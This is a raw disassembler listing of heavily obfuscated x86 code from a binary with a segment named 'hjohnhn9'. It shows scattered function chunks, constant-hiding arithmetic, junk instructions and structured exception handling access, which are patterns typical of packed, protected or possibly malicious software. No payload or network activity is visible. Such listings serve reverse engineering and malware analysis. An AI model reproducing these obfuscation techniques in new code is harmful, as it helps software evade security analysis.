; START OF FUNCTION CHUNK FOR sub_423F65
loc_426C64: ; CODE XREF: sub_423F65+12CB�j
; hjohnhn9:loc_426CE0�j
jmp loc_428BF7
; END OF FUNCTION CHUNK FOR sub_423F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A75
loc_426C69: ; CODE XREF: sub_423A75+8�j
jmp loc_4271B8
; END OF FUNCTION CHUNK FOR sub_423A75
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_43. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E7B
loc_426C6F: ; CODE XREF: sub_427E7B+5�j
jmp nullsub_42
; END OF FUNCTION CHUNK FOR sub_427E7B
; ---------------------------------------------------------------------------
test esi, 23688F42h
jmp loc_428440
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_426C7F: ; CODE XREF: sub_424161:loc_424D68�j
jl loc_4251B2
add ecx, 0DC4540C3h
mov esi, 0D440BF32h
jo loc_423F86
jmp loc_4251B2
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_426C9B: ; CODE XREF: sub_4263E3-1382�j
js loc_42326A
loc_426CA1: ; CODE XREF: sub_4263E3:loc_4248A6�j
call sub_424877
push 920F95FFh
pop edx
add edx, 91B68572h
sub edx, 7BF5D68h
xor edx, 78E917E4h
call sub_4279ED
jmp loc_4290A8
; END OF FUNCTION CHUNK FOR sub_4263E3
; =============== S U B R O U T I N E =======================================
sub_426CC8 proc near ; DATA XREF: hjohnhn9:loc_428BA0�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042484F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004260B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042633F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426DCF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426F98 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004286BD SIZE 00000020 BYTES
lea eax, [ebp-14h]
push eax
call sub_423425
push ecx
push 948EBC6Bh
pop ecx
rol ecx, 0Eh
jmp loc_42484F
sub_426CC8 endp
; ---------------------------------------------------------------------------
loc_426CE0: ; CODE XREF: hjohnhn9:00424962�j
jns loc_426C64
; =============== S U B R O U T I N E =======================================
sub_426CE6 proc near ; CODE XREF: sub_4262C5:loc_4264E6�p
; FUNCTION CHUNK AT 0042376C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423EC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004283E0 SIZE 0000000C BYTES
xchg edx, [esp+0]
pop edx
add eax, 82C2CCCDh
jmp loc_423EC1
sub_426CE6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_426CF5: ; CODE XREF: hjohnhn9:004274D0�j
js loc_423D79
not esi
jmp sub_4240E6
; =============== S U B R O U T I N E =======================================
sub_426D02 proc near ; CODE XREF: sub_428FD3+3�j
; FUNCTION CHUNK AT 0042326A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427458 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004274D5 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00428806 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00428F06 SIZE 00000005 BYTES
add esp, 0FFFFFFECh
cmp ds:dword_428AF0, 0
jnz loc_428806
jmp loc_428F06
sub_426D02 endp
; =============== S U B R O U T I N E =======================================
sub_426D17 proc near ; CODE XREF: hjohnhn9:loc_42462C�p
; hjohnhn9:00428B41�j
; FUNCTION CHUNK AT 004234F1 SIZE 00000014 BYTES
xchg edx, [esp+0]
pop edx
call sub_424877
mov edx, 0A22F8A70h
call sub_427C53
jmp loc_4234F1
sub_426D17 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_426D2F: ; CODE XREF: sub_423CDB:loc_425076�j
add eax, 18h
loc_426D32: ; CODE XREF: hjohnhn9:loc_423D33�j
mov [ebp-10h], eax
loc_426D35: ; CODE XREF: hjohnhn9:loc_42432F�j
mov eax, [ebp-10h]
mov eax, [eax+60h]
add eax, [ebp-4]
mov [ebp-14h], eax
jmp loc_4283F7
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
loc_426D46: ; CODE XREF: hjohnhn9:004281DA�j
shr edi, 1
test esi, edx
jmp near ptr dword_4236FC+0Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247F4
loc_426D4F: ; CODE XREF: sub_4247F4+8�j
pop ebp
xor eax, eax
push esi
push 0CF9699A1h
pop esi
and esi, 2FAD298Fh
add esi, 31404E79h
jmp loc_428A7E
; END OF FUNCTION CHUNK FOR sub_4247F4
; =============== S U B R O U T I N E =======================================
sub_426D6A proc near ; CODE XREF: hjohnhn9:004283F2�j
; sub_425C98+2AEB�p
xchg esi, [esp+0]
pop esi
push ebx
push 35781F85h
pop ebx
sub ebx, 0C4F0A04Ah
xor ebx, 0DDF980Dh
jns near ptr dword_4236FC+7
loc_426D87: ; CODE XREF: hjohnhn9:00423829�j
jmp loc_427D5C
sub_426D6A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_426D8C: ; CODE XREF: sub_4260BD-6E�j
jns loc_424DB8
push ecx
loc_426D93: ; CODE XREF: sub_4260BD:loc_424A12�j
mov byte ptr [ebp-20h], 2Dh
inc dword ptr [ebp-10h]
neg dword ptr [ebp-8]
loc_426D9D: ; CODE XREF: sub_4260BD+1585�j
call sub_423753
mov [ecx], ebx
pushf
jmp sub_426211
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_426DAA: ; CODE XREF: sub_424A78:loc_427984�j
pop esi
mov eax, [eax]
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
mov esp, ebp
jmp loc_42380B
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240AE
loc_426DBA: ; CODE XREF: sub_4240AE+9�j
push esi
push 76D18151h
pop esi
rol esi, 8
sub esi, 68E4B3E7h
jmp loc_42769B
; END OF FUNCTION CHUNK FOR sub_4240AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CC8
loc_426DCF: ; CODE XREF: sub_426CC8-246D�j
jnz loc_426F98
; END OF FUNCTION CHUNK FOR sub_426CC8
; START OF FUNCTION CHUNK FOR sub_426E8C
loc_426DD5: ; CODE XREF: sub_426E8C+A�j
jmp loc_4248D5
; END OF FUNCTION CHUNK FOR sub_426E8C
; ---------------------------------------------------------------------------
mov [ebx], edx
mov eax, [esi]
jmp loc_426F98
; ---------------------------------------------------------------------------
adc edx, esi
jmp loc_4250C1
; ---------------------------------------------------------------------------
xchg esi, [ebp+0]
jmp loc_425EE4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_426DF3: ; CODE XREF: sub_42325E+3CF7�j
test ebp, edi
jmp loc_425205
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_426DFA: ; CODE XREF: sub_427C9B+13�j
popf
; END OF FUNCTION CHUNK FOR sub_427C9B
; =============== S U B R O U T I N E =======================================
sub_426DFB proc near ; CODE XREF: sub_4237F4+BF4�p
; FUNCTION CHUNK AT 00423495 SIZE 00000012 BYTES
xchg ebx, [esp+0]
pop ebx
push ebp
mov ebp, eax
loc_426E02: ; CODE XREF: sub_428E98:loc_423E17�j
jmp loc_4234A2
sub_426DFB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_426E07: ; CODE XREF: sub_426354:loc_4283BF�j
jz loc_42909E
jmp loc_427A11
; ---------------------------------------------------------------------------
loc_426E12: ; CODE XREF: sub_426354-47B�j
push offset loc_4237BD
jmp nullsub_25
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
mov eax, ds:dword_4252D0
call sub_4244F5
mov esp, ebp
xchg ecx, [esp]
mov ebp, ecx
pop ecx
push esi
jmp loc_4241AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_115. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_426E35: ; CODE XREF: sub_424631+1F11�j
jmp loc_423ED7
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
dw 3F06h
dword_426E3C dd 77E60000h ; DATA XREF: sub_4240E6+4�r
; sub_4284CB:loc_427FBF�r ...
dword_426E40 dd 37392B6Bh, 8C331B65h, 6C8D235Ch ; DATA XREF: hjohnhn9:00428061�o
; hjohnhn9:loc_4280BF�o
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_426E4D: ; CODE XREF: sub_4260BD-1737�j
jmp loc_4282E4
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
dw 227h
byte_426E54 db 1 ; DATA XREF: sub_426749+1AC2�w
; sub_426749+2702�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42698F
loc_426E55: ; CODE XREF: sub_42698F+C�j
jmp loc_42726B
; END OF FUNCTION CHUNK FOR sub_42698F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426708
loc_426E5A: ; CODE XREF: sub_426708-53E�j
jmp loc_426311
; END OF FUNCTION CHUNK FOR sub_426708
; ---------------------------------------------------------------------------
db 76h
dword_426E60 dd 6C911D6Eh, 6323176Ch, 5209008Dh ; DATA XREF: sub_426749+2712�o
dword_426E6C dd 77F50000h ; DATA XREF: sub_426749:loc_423741�r
; sub_426749+1ABD�w
; ---------------------------------------------------------------------------
loc_426E70: ; CODE XREF: hjohnhn9:0042887D�j
jmp loc_427CB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E85
loc_426E75: ; CODE XREF: sub_427E85-A0A�j
jmp loc_423F15
; END OF FUNCTION CHUNK FOR sub_427E85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_426E7A: ; CODE XREF: sub_424161-4C5�j
jmp loc_423CC4
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
not edi
jmp sub_424345
; ---------------------------------------------------------------------------
loc_426E86: ; CODE XREF: hjohnhn9:00424CE7�j
jp loc_42510D
; =============== S U B R O U T I N E =======================================
sub_426E8C proc near ; CODE XREF: sub_426A30+190�p
; FUNCTION CHUNK AT 004248D5 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00426DD5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042804B SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
jz loc_425B24
jmp loc_426DD5
sub_426E8C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426475
loc_426E9B: ; CODE XREF: sub_426475:loc_427EA1�j
cmp ecx, 9029DA59h
jmp loc_4231C3
; END OF FUNCTION CHUNK FOR sub_426475
; ---------------------------------------------------------------------------
loc_426EA6: ; CODE XREF: hjohnhn9:00426201�j
popf
js loc_424E1C
loc_426EAD: ; CODE XREF: hjohnhn9:loc_428414�j
push 1134D065h
pop eax
xor eax, 0C4F530B5h
or eax, 337FEE7Dh
jmp loc_426A09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_426EC4: ; CODE XREF: sub_424819+2BEC�j
push eax
push 0
push edx
push 0AA96A096h
pop edx
xor edx, 0A7A694FEh
and edx, 9A1ACD69h
test edx, 4000h
jmp loc_425F9E
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_426EE5: ; CODE XREF: sub_4260BD:loc_423BF1�j
mov esi, ebp
xchg esi, [esp+0]
mov ebp, esp
add esp, 0FFFFFFE0h
mov [ebp-8], edx
push ebx
jmp loc_427431
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
locret_426EF8: ; CODE XREF: hjohnhn9:004237D2�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_426EF9: ; CODE XREF: sub_42304F+44BA�j
jmp loc_424D8C
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_426EFE: ; CODE XREF: sub_425BD2-1CAF�j
; sub_427BCE-848�j
jmp loc_428B34
; ---------------------------------------------------------------------------
loc_426F03: ; CODE XREF: sub_425BD2:loc_424788�j
mov eax, [ebp-10h]
mov al, [ebp+eax-20h]
push 0CA48626Ah
pop edx
add edx, 0D275ECDEh
or edx, 2CE8D87Ah
rol edx, 1Fh
jmp loc_424266
; ---------------------------------------------------------------------------
loc_426F24: ; CODE XREF: sub_425BD2:loc_427881�j
jge loc_424788
jmp loc_425AE1
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
pop ebx
jmp sub_426A78
; ---------------------------------------------------------------------------
loc_426F35: ; DATA XREF: hjohnhn9:00426119�o
cmp dword ptr [ebp-8], 0
jnz loc_428BAC
jmp loc_426344
; ---------------------------------------------------------------------------
pushf
test ecx, 327C5875h
jmp loc_427160
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_426F50: ; CODE XREF: sub_42325E+82A�j
push 0E629B8E1h
jmp loc_426DF3
; END OF FUNCTION CHUNK FOR sub_42325E
; =============== S U B R O U T I N E =======================================
sub_426F5A proc near ; DATA XREF: hjohnhn9:00423C7B�o
; FUNCTION CHUNK AT 0042365D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E8D SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042513C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425C33 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00425D65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426A0E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426BA8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00427339 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00427B8D SIZE 00000005 BYTES
mov eax, [ebp-20h]
mov byte ptr [eax], 0
inc dword ptr [ebp-1Ch]
jmp loc_425D65
sub_426F5A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_426F68: ; CODE XREF: hjohnhn9:004266D5�j
inc dword ptr [ebp-1Ch]
jmp loc_426B9C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4290CF
loc_426F70: ; CODE XREF: sub_4244F5-14E�j
; sub_4290CF+4�j
inc dword ptr [ebp-18h]
push offset sub_425F3F
jmp loc_4246A3
; END OF FUNCTION CHUNK FOR sub_4290CF
; ---------------------------------------------------------------------------
xchg ebx, [ebp+0]
jmp sub_42387A
; =============== S U B R O U T I N E =======================================
sub_426F85 proc near ; CODE XREF: sub_427C53:loc_427AA2�j
; FUNCTION CHUNK AT 004260CD SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042726D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004277CE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428150 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428D00 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428EEB SIZE 00000007 BYTES
add esp, 0FFFFFFE4h
mov [ebp-8], edx
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
jmp loc_4260CD
sub_426F85 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CC8
loc_426F98: ; CODE XREF: sub_426CC8:loc_426DCF�j
; hjohnhn9:00426DDE�j
sub ecx, 0EC213638h
and ecx, 0D1BF21DAh
add ecx, 40256A96h
mov [ecx], eax
pop ecx
loc_426FAD: ; CODE XREF: hjohnhn9:004236D9�j
lea eax, [ebp-14h]
xor edx, edx
push ecx
jmp loc_42633F
; END OF FUNCTION CHUNK FOR sub_426CC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_426FB8: ; CODE XREF: sub_42363F:loc_4265C3�j
ror eax, 12h
mov ds:dword_428B18, eax
locret_426FC1: ; CODE XREF: sub_42362A:loc_42911D�j
retn
; END OF FUNCTION CHUNK FOR sub_42363F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4235C9
loc_426FC2: ; CODE XREF: sub_4235C9+A�j
jmp loc_42326F
; END OF FUNCTION CHUNK FOR sub_4235C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_426FC7: ; CODE XREF: sub_42363F+2649�j
; sub_426F5A-3AB�j
rol eax, 12h
jmp loc_4289FD
; END OF FUNCTION CHUNK FOR sub_42363F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42345B
loc_426FCF: ; CODE XREF: sub_42345B+6�j
jno loc_4243BD
mov ebp, esp
push ecx
push 231CBC7Bh
jmp loc_428892
; END OF FUNCTION CHUNK FOR sub_42345B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_426FE2: ; CODE XREF: sub_42325E+496B�j
cmp edi, ecx
loc_426FE4: ; CODE XREF: sub_428E98+1�j
jmp loc_428B46
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_426FE9: ; CODE XREF: sub_427564+D�j
jnz sub_427DE6
jmp loc_4245D2
; END OF FUNCTION CHUNK FOR sub_427564
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A30
loc_426FF4: ; CODE XREF: sub_426A30+760�j
jz loc_4247C1
call sub_426859
jnz loc_427181
mov ecx, [ebx+edx-4]
or ecx, ecx
jz loc_4247C1
mov ebx, [ebx+ecx]
jmp loc_4247BC
; END OF FUNCTION CHUNK FOR sub_426A30
; ---------------------------------------------------------------------------
shl ebx, 7
jmp loc_424922
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42873F
loc_427021: ; CODE XREF: sub_42873F:loc_4252D4�j
jnz loc_428748
retn
; END OF FUNCTION CHUNK FOR sub_42873F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_427028: ; CODE XREF: sub_425BD2+2F68�j
jmp loc_425F81
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424361
loc_42702D: ; CODE XREF: sub_424361+11�j
jmp loc_426B21
; END OF FUNCTION CHUNK FOR sub_424361
; =============== S U B R O U T I N E =======================================
sub_427032 proc near ; CODE XREF: sub_426A30+E�p
; FUNCTION CHUNK AT 00423806 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424480 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00426847 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00427E3F SIZE 00000015 BYTES
mov eax, large fs:0
loc_427039: ; CODE XREF: sub_427032-2BAD�j
; sub_424D25+C�j
jnz loc_42448C
cmp dword ptr [eax], 0FFFFFFFFh
jmp loc_423806
sub_427032 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_77. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428CAF
loc_427048: ; CODE XREF: sub_428CAF+15�j
pop eax
add eax, 1676D70Ah
rol eax, 11h
xor eax, 0D004D392h
add eax, ebp
push esi
jmp loc_4242DE
; END OF FUNCTION CHUNK FOR sub_428CAF
; ---------------------------------------------------------------------------
loc_427060: ; CODE XREF: hjohnhn9:0042511C�j
test edx, esi
jmp loc_427749
; ---------------------------------------------------------------------------
pop ecx
jmp sub_4235D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236A7
loc_42706D: ; CODE XREF: sub_4236A7:loc_424BAE�j
; hjohnhn9:00428F38�j
or esi, 1018A317h
sub esi, 25967CE4h
or esi, 4B12ED79h
; END OF FUNCTION CHUNK FOR sub_4236A7
; START OF FUNCTION CHUNK FOR sub_428E98
loc_42707F: ; CODE XREF: sub_428E98-507B�j
xor esi, 0FBF2FFFFh
loc_427085: ; CODE XREF: hjohnhn9:loc_427EF5�j
add eax, esi
jmp loc_428A97
; END OF FUNCTION CHUNK FOR sub_428E98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_42708C: ; CODE XREF: sub_424631:loc_424F3E�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jnz loc_423F3D
jmp loc_428667
; ---------------------------------------------------------------------------
loc_4270A1: ; CODE XREF: sub_424631:loc_424F28�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_4249A3
jmp loc_428567
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
loc_4270B6: ; CODE XREF: hjohnhn9:00425B60�j
rol eax, 9
push eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425029
loc_4270BB: ; CODE XREF: sub_4289A4+9�j
jmp loc_4267FC
; END OF FUNCTION CHUNK FOR sub_425029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427363
loc_4270C0: ; CODE XREF: sub_427363+7�j
jmp loc_425DB7
; END OF FUNCTION CHUNK FOR sub_427363
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265A0
loc_4270C5: ; CODE XREF: sub_4265A0+D�j
jmp sub_42855B
; END OF FUNCTION CHUNK FOR sub_4265A0
; ---------------------------------------------------------------------------
loc_4270CA: ; CODE XREF: hjohnhn9:00424B75�j
jmp loc_426388
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4270CF proc near ; CODE XREF: sub_425CB3-1BDA�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042764D SIZE 0000000A BYTES
push ebp
mov ebp, esp
push ebx
mov ebx, edx
xchg ebx, [esp+4+var_4]
jmp loc_42764D
sub_4270CF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42387A
loc_4270DD: ; CODE XREF: sub_42387A:loc_4271B3�j
jns loc_426685
loc_4270E3: ; CODE XREF: sub_423BC3+50DD�j
jmp loc_427BF3
; END OF FUNCTION CHUNK FOR sub_42387A
; ---------------------------------------------------------------------------
adc esi, 0B23EB003h
; START OF FUNCTION CHUNK FOR sub_423444
loc_4270EE: ; CODE XREF: sub_423444+5�j
jge sub_423FB9
jnp loc_4260B8
sbb ebp, eax
jmp loc_426685
; END OF FUNCTION CHUNK FOR sub_423444
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_37. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_427102: ; CODE XREF: sub_42304F:loc_4237EA�j
cmp eax, 0FFFFFFFFh
jz loc_427112
mov eax, [eax]
jmp loc_426C4F
; ---------------------------------------------------------------------------
loc_427112: ; CODE XREF: sub_42304F+40B6�j
; sub_42304F+436B�j ...
xor ebx, ebx
jmp loc_426833
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42303E
loc_427119: ; CODE XREF: sub_42303E:loc_424896�j
add [ebp-8], eax
mov eax, [ebp-8]
shr eax, 6
xor [ebp-8], eax
inc dword ptr [ebp-0Ch]
jmp loc_4249B5
; END OF FUNCTION CHUNK FOR sub_42303E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425029
loc_42712D: ; CODE XREF: sub_425029+7�j
; sub_427F90+FED�j
inc dword ptr [ebp-8]
call sub_42486B
loc_427135: ; CODE XREF: sub_427F90+50A�j
jmp loc_425040
; END OF FUNCTION CHUNK FOR sub_425029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_42713A: ; CODE XREF: sub_423BC3+AA6�j
jmp loc_423388
; END OF FUNCTION CHUNK FOR sub_423BC3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_109. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_427140: ; CODE XREF: sub_42325E:loc_4276C0�j
pop ecx
rol ecx, 17h
sub ecx, ds:4000F4h
add ecx, 9FCF4E83h
add ecx, ebp
add ecx, 0EBC72302h
mov [ecx], eax
pop ecx
jmp loc_424261
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
loc_427160: ; CODE XREF: hjohnhn9:00426F4B�j
jp loc_423E8F
; =============== S U B R O U T I N E =======================================
sub_427166 proc near ; CODE XREF: sub_424631:loc_423B9C�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424608 SIZE 00000024 BYTES
xchg edx, [esp+0]
pop edx
rol eax, 7
push eax
push esi
push 1190FCD1h
jmp loc_424608
sub_427166 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A30
loc_427179: ; CODE XREF: sub_426A30+22�j
or edx, edx
jz loc_4247C1
loc_427181: ; CODE XREF: sub_426A30+5CF�j
; sub_426A30+1E82�j
jnz loc_42328D
add edx, 14h
mov ecx, [ebx+edx-8]
or ecx, ecx
jmp loc_426FF4
; END OF FUNCTION CHUNK FOR sub_426A30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_427195: ; CODE XREF: sub_427C9B+5C�j
adc edi, ecx
sub ebp, esi
ror eax, 0Fh
xor ebp, ebx
loc_42719E: ; CODE XREF: sub_427C9B:loc_427CE6�j
add eax, 6C2F4752h
call sub_425BF2
loc_4271A9: ; CODE XREF: hjohnhn9:00424A8D�j
jmp loc_429050
; ---------------------------------------------------------------------------
loc_4271AE: ; CODE XREF: hjohnhn9:004242C1�j
; sub_427C9B:loc_42858D�j
jmp loc_428EBF
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42387A
loc_4271B3: ; CODE XREF: sub_42387A+1A�j
jmp loc_4270DD
; END OF FUNCTION CHUNK FOR sub_42387A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A75
loc_4271B8: ; CODE XREF: sub_423A75:loc_426C69�j
pop ebx
or ebx, 0C6FF0DC4h
add ebx, 804F2E92h
add edx, ebx
pop ebx
mov edx, [edx]
jmp sub_4285DF
; END OF FUNCTION CHUNK FOR sub_423A75
; ---------------------------------------------------------------------------
xor ecx, 1CEA3F9Eh
jmp sub_427463
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CCD
loc_4271DA: ; CODE XREF: sub_423CCD:loc_427B92�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
test byte ptr [eax-8], 80h
jz loc_427272
call sub_42698F
; END OF FUNCTION CHUNK FOR sub_423CCD
; START OF FUNCTION CHUNK FOR sub_427486
loc_4271F2: ; CODE XREF: sub_427486:loc_425D38�j
jnz loc_424E94
jmp loc_428DEE
; END OF FUNCTION CHUNK FOR sub_427486
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_4271FD: ; CODE XREF: sub_424161+446�j
jno loc_42405C
jmp loc_426054
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
loc_427208: ; CODE XREF: hjohnhn9:00428B7D�j
jnz loc_426335
jmp loc_4282C9
; ---------------------------------------------------------------------------
mov eax, [ecx]
not ebp
jmp sub_428E76
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_85. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_42721D: ; CODE XREF: sub_427486+B9B�j
jmp loc_424D52
; END OF FUNCTION CHUNK FOR sub_427486
; ---------------------------------------------------------------------------
or eax, ebp
jmp sub_4263C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423753
loc_427229: ; CODE XREF: sub_423753+25A8�j
add edx, 3B6EABB3h
jmp loc_428BAA
; END OF FUNCTION CHUNK FOR sub_423753
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_427234: ; CODE XREF: sub_4287BF-12F�j
jle loc_4268DB
mov eax, [ebp-4]
xor edx, edx
push edx
loc_427240: ; CODE XREF: hjohnhn9:loc_427749�j
push eax
jmp loc_42510D
; ---------------------------------------------------------------------------
loc_427246: ; CODE XREF: sub_4287BF:loc_42867B�j
mov eax, [ebp-4]
call sub_426924
jmp loc_423022
; END OF FUNCTION CHUNK FOR sub_4287BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_427253: ; CODE XREF: sub_425BD2:loc_4265B8�j
dec dword ptr [ebp-10h]
push offset loc_4246C9
jmp loc_4266A1
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF2
loc_427260: ; CODE XREF: sub_425BF2+E�j
jz loc_4290BA
